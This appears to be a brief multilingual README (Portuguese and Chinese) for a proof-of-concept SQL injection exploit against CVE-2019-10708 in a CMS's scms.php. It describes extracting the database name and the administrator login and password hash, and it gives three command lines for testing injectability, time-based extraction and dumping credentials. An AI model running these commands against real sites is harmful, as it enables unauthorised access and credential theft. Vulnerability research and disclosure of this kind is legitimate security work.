
CVE-2019-10708 SQL injection PoC
exploit.py é um PoC para a vulnerabilidade CVE-2019-10708, implementa multiprocessing para injeção, obtém o nome do banco de dados e as credenciais de administrador do backend (recomendado para versões anteriores a 20190401).
# 测试是否可注入
python3 exploit.py http:localhost/js/scms.php --test
# sleep时间为60秒与取得资料库
python3 exploit.py http:localhost/js/scms.php -s 60 --db
# 取得A_login与A_pwd
python3 exploit.py http:localhost/js/scms.php --login --pwd